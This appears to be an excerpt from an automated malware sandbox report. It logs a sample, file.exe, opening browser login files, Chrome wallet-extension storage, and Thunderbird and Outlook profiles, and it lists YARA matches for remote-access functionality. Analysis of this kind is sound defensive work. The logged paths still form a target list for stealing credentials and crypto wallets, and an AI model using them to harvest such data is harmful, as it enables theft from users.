Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_hnfanknocfeofbddgcijnmhnfnkdnaad_0.indexeddb.leveldb\CURRENT			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip, type: DROPPED